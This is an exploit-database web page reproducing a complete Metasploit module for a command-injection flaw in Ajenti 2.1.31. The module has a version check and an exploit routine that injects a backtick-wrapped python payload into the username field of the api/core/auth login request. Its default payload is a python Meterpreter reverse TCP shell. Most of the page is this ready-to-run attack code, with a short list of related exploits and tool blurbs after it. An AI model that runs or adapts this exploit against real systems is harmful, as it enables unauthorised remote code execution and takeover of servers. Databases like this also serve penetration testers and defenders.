Search for hundreds of thousands of exploits

"Ajenti 2.1.31 - Remote Code Exection (Metasploit)"

Author

Exploit author

"Onur ER"

Platform

Exploit platform

json

Release date

Exploit published date

2019-10-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name'            => "Ajenti 2.1.31 Remote Code Execution",
                      'Description'     => %q{
                        This module exploits a command injection in Ajenti <= 2.1.31.
                        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
                      },
                      'Author'          => [
                          'Jeremy Brown', # Vulnerability discovery
                          'Onur ER <onur@onurer.net>' # Metasploit module
                      ],
                      'References'      => [
                          ['EDB', '47497']
                      ],
                      'DisclosureDate'  => '2019-10-14',
                      'License'         => MSF_LICENSE,
                      'Platform'        => 'python',
                      'Arch'            => ARCH_PYTHON,
                      'Privileged'      => false,
                      'Targets'         => [
                          [ 'Ajenti <= 2.1.31', {} ]
                      ],
                      'DefaultOptions'  =>
                          {
                              'RPORT'   => 8000,
                              'SSL'     => 'True',
                              'payload' => 'python/meterpreter/reverse_tcp'
                          },
                      'DefaultTarget'   => 0
          ))
    register_options([
                         OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi({
                               'method' => 'GET',
                               'uri'    => "/view/login/normal"
                           })
    if res and res.code == 200
      if res.body =~ /'ajentiVersion', '2.1.31'/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /Ajenti/
        return Exploit::CheckCode::Detected
      end
    end
    vprint_error("Unable to determine due to a HTTP connection timeout")
    return Exploit::CheckCode::Unknown
  end


  def exploit
    print_status("Exploiting...")
    random_password = rand_text_alpha_lower(7)
    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
                  'password' => random_password,
                  'mode' => 'normal'
    }
    res = send_request_cgi({
         'method' => 'POST',
         'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
         'ctype'  => 'application/json',
         'data'   => JSON.generate(json_body)
     })
  end
end
Release DateTitleTypePlatformAuthor
2019-12-12"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)"webappsphp"Onur ER"
2019-10-30"Ajenti 2.1.31 - Remote Code Exection (Metasploit)"webappsjson"Onur ER"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47560/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.